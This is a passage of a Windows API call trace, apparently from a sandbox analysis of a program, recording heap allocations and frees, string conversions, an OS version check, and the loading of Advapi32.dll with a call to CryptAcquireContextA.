[0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0087.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.788] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.789] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.789] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.789] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.789] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0087.789] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0087.790] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.790] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.791] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.791] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.791] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0087.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa64c0 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f6f60 [0087.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.795] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0087.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 